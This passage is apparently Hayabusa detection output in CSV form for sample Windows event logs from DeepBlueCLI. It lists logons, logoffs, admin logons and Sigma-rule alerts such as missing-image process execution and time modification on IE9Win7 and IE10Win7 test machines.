IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:41:21.932 
+09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 02:59:00.431 
+09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 
+09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:46.785 
+09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other 
File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 
08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 
00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target 
Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 